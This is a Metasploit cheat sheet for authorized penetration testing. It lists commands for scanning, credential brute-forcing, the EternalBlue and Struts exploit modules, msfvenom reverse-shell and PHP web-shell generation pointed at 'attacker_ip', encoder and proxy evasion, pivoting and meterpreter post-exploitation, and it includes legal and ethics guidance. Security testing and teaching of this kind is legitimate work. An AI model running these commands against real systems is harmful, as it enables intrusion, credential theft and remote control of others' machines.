Metasploit Framework Cheat Sheet for Penetration Testing

⚠️ IMPORTANT DISCLAIMER ⚠️
This cheat sheet is intended exclusively for authorized penetration testing, security research, and educational purposes. Only use Metasploit on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and unethical. Always follow responsible disclosure practices and comply with all applicable laws and regulations.

Getting Started

Installation and Setup

# Update Metasploit (Kali Linux)
sudo apt update && sudo apt install metasploit-framework

# Start PostgreSQL database
sudo systemctl start postgresql

# Initialize Metasploit database
sudo msfdb init

# Launch Metasploit console
msfconsole

Basic Console Commands

# Get help
help
?

# Update Metasploit
msfupdate

# Exit Metasploit
exit
quit

Core Commands and Navigation

Information and Search

# Show available modules
show exploits
show payloads
show auxiliary
show post
show encoders
show nops

# Search for modules
search <keyword>
search type:exploit platform:windows
search cve:2017-0144

# Get module information
info <module_name>
show options
show missing
show targets
show payloads

Module Selection and Usage

# Use a module
use <module_path>
use exploit/windows/smb/ms17_010_eternalblue

# Back out of current module
back

# Show current module options
show options
show advanced
show evasion

# Set module options
set RHOSTS 192.168.1.100
set RHOST 10.0.0.1
set LHOST 192.168.1.50
set LPORT 4444
set payload windows/meterpreter/reverse_tcp

# Unset options
unset RHOSTS
unset all

# Set global variables
setg RHOSTS 192.168.1.0/24
setg LHOST 192.168.1.50

Reconnaissance and Information Gathering

Port Scanning

# TCP port scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 1-1000
run

# SYN scan
use auxiliary/scanner/portscan/syn
set RHOSTS target_ip
run

# Service version detection
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.0/24
run

Service Enumeration

# SMB enumeration
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers

# HTTP enumeration
use auxiliary/scanner/http/http_version
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir

# SSH enumeration
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login

# FTP enumeration
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous

Database Integration

# Show database status
db_status

# Create workspace
workspace -a project_name
workspace project_name

# Import scan results
db_import nmap_scan.xml

# Show discovered hosts/services
hosts
services
vulns

# Search database
hosts -S windows
services -p 445

Vulnerability Assessment

Vulnerability Scanners

# SMB vulnerability scanner
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run

# Web application scanners
use auxiliary/scanner/http/ssl_version
use auxiliary/scanner/http/http_put
use auxiliary/scanner/http/backup_file

# Database scanners
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mssql/mssql_ping

Credential Testing

# SSH login testing
use auxiliary/scanner/ssh/ssh_login
set RHOSTS target_ip
set USER_FILE /usr/share/wordlists/users.txt
set PASS_FILE /usr/share/wordlists/passwords.txt
run

# SMB login testing
use auxiliary/scanner/smb/smb_login
set RHOSTS target_ip
set SMBUser administrator
set SMBPass password123
run

# HTTP basic auth testing
use auxiliary/scanner/http/http_login
set RHOSTS target_ip
set AUTH_URI /admin
run

Payload Generation and Handling

MSFVenom (Payload Generator)

# List available payloads
msfvenom --list payloads

# Generate Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe

# Generate Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf > shell.elf

# Generate PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw > shell.php

# Generate encoded payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > encoded_shell.exe

Multi/Handler

# Set up listener for reverse shells
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 4444
exploit -j -z

# Background the handler
exploit -j

Post-Exploitation Fundamentals

Session Management

# List active sessions
sessions -l

# Interact with session
sessions -i 1

# Background current session
background

# Kill session
sessions -k 1

# Route traffic through session
route add 192.168.2.0/24 1

Basic Meterpreter Commands

# System information
sysinfo
getuid
getpid

# File system operations
pwd
ls
cd /path/to/directory
download file.txt
upload file.txt

# Process operations
ps
migrate <pid>
kill <pid>

# Network information
ifconfig
netstat
arp

Web Application Testing

HTTP Auxiliary Modules

# Directory enumeration
use auxiliary/scanner/http/dir_scanner
set RHOSTS target_ip
set DICTIONARY /usr/share/wordlists/dirb/common.txt
run

# HTTP methods testing
use auxiliary/scanner/http/http_put
set RHOSTS target_ip
run

# SSL/TLS testing
use auxiliary/scanner/http/ssl_version
set RHOSTS target_ip
run

Web Application Exploits

# Search for web application exploits
search webapp
search type:exploit platform:php

# Example: Apache Struts exploitation
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target_ip
set TARGETURI /vulnerable_app/
run

Best Practices for Penetration Testing

Documentation and Reporting

# Enable logging
spool /path/to/logfile.txt

# Take screenshots (Meterpreter)
screenshot

# Save session transcript
script -rec transcript.txt

# Export database findings
db_export -f xml report.xml

Evasion and Stealth

# Use evasion modules
show evasion

# Set evasion options
set target::http::header::user_agent "Custom User Agent"
set tcp::max_send_size 1024

# Use delays between attempts
set ConnectTimeout 30
set Proxies socks4:127.0.0.1:9050

Resource Scripts

# Create resource script
echo "use exploit/multi/handler" > handler.rc
echo "set payload windows/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.50" >> handler.rc
echo "exploit -j" >> handler.rc

# Run resource script
msfconsole -r handler.rc
resource handler.rc

Advanced Techniques

Pivoting and Tunneling

# Add route through compromised host
route add 10.0.0.0/24 session_id

# Set up SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j

# Port forwarding
portfwd add -l 8080 -p 80 -r target_ip

Custom Module Development

# Module locations
~/.msf4/modules/
/usr/share/metasploit-framework/modules/

# Reload modules
reload_all
reload_lib

# Test custom modules
check

Workspace Management

Project Organization

# Create and manage workspaces
workspace -a client_pentest_2024
workspace -l
workspace client_pentest_2024

# Import external scan data
db_import nessus_scan.nessus
db_import nmap_results.xml

# Export workspace data
db_export -f xml -a client_report.xml

Security Testing Scenarios

Internal Network Assessment

# 1. Network discovery
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.1.0/24
run

# 2. Service enumeration
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# 3. Vulnerability identification
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run

Wireless Security Testing

# Wireless auxiliary modules
search type:auxiliary wireless
use auxiliary/scanner/wireless/kismet_logging

Troubleshooting Common Issues

Connection Problems

# Check firewall settings
# Verify IP addressing
# Test connectivity with ping/telnet

# Debug payload connections
set Verbose true
set ExitOnSession false

Performance Optimization

# Set threading for scanners
set THREADS 20

# Optimize database queries
db_status
db_rebuild_cache

Legal and Ethical Guidelines

Authorization Requirements

• ✅ Written permission from system owner
• ✅ Clear scope of testing defined
• ✅ Rules of engagement established
• ✅ Emergency contact procedures
• ✅ Data handling agreements

Professional Standards

• Document all activities thoroughly
• Follow responsible disclosure timelines
• Maintain confidentiality of client data
• Provide clear, actionable recommendations
• Ensure minimal impact on production systems

Compliance Considerations

• PCI DSS penetration testing requirements
• HIPAA security assessments
• SOX compliance testing
• Industry-specific regulations

Conclusion

Metasploit is a powerful framework for authorized security testing when used responsibly. This cheat sheet provides essential commands and workflows for legitimate penetration testing activities. Remember that effective penetration testing requires not just technical skills, but also strong ethical standards and thorough documentation practices.

Key Reminders:

• Always obtain proper authorization before testing
• Document everything for client reports
• Follow coordinated vulnerability disclosure
• Stay updated with latest security research
• Continuous learning is essential in cybersecurity

Additional Resources:

• Official Metasploit Documentation
• Penetration Testing Execution Standard (PTES)
• OWASP Testing Guide
• NIST Cybersecurity Framework
• Offensive Security Training Materials

Use this knowledge responsibly to improve cybersecurity defenses.